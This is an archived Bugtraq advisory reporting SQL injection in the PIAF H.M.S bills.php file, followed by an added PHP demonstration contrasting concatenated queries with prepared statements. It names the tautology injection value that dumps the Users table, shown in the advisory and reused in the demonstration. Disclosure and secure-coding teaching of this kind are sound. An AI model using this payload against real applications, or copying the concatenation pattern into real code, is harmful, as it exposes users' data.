Bugtraq mailing list archives
PIAF H.M.S - SQL Injection
From: Michał Błaszczak <blaszczakm () gmail com>
Date: Sun, 28 Oct 2012 13:29:31 +0100
# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: Michał Błaszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/

file: bills.php
line: 86-87

$query = $query . " ORDER BY ID DESC";
printf($query);

query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC

Michał Błaszczak
blaszczakm.blogspot.com
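Added example, not part of the original post and not PIAF H.M.S source: the query shape quoted in the report, built once by string concatenation and once as a prepared statement, to show how binding the Room value changes the result. Assumptions: an in-memory SQLite database through PDO stands in for the application's database, the sample rows are constructed, and the function names findByRoomConcat and findByRoomPrepared are hypothetical.

```php
<?php
// Added illustration, not PIAF H.M.S code. Table and column names follow the
// query quoted in the report; rows and function names are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE Users (ID INTEGER PRIMARY KEY, Name TEXT, Room TEXT)");
$db->exec("INSERT INTO Users (Name, Room)
           VALUES ('alice', '101'), ('bob', '102'), ('carol', '203')");

// Pattern that yields the reported query: the value is pasted between the
// quotes, so a quote character inside it ends the string literal early.
function findByRoomConcat(PDO $db, string $room): array
{
    $query = "SELECT * FROM `Users` WHERE `Room` = '" . $room . "'";
    $query = $query . " ORDER BY ID DESC";
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: the statement text is fixed and the value travels as a
// bound parameter, so it is only ever compared against the Room column.
function findByRoomPrepared(PDO $db, string $room): array
{
    $stmt = $db->prepare(
        "SELECT * FROM `Users` WHERE `Room` = :room ORDER BY ID DESC"
    );
    $stmt->execute([':room' => $room]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Room value that produces the query text shown in the report.
$reported = "anything' OR 'x'='x";

printf("concatenated, reported value: %d rows\n",
       count(findByRoomConcat($db, $reported)));
printf("prepared, reported value:     %d rows\n",
       count(findByRoomPrepared($db, $reported)));
printf("prepared, room 101:           %d rows\n",
       count(findByRoomPrepared($db, '101')));
```

The concatenated version returns every row in Users for the reported value, while the prepared version returns only rows whose Room column equals the supplied string.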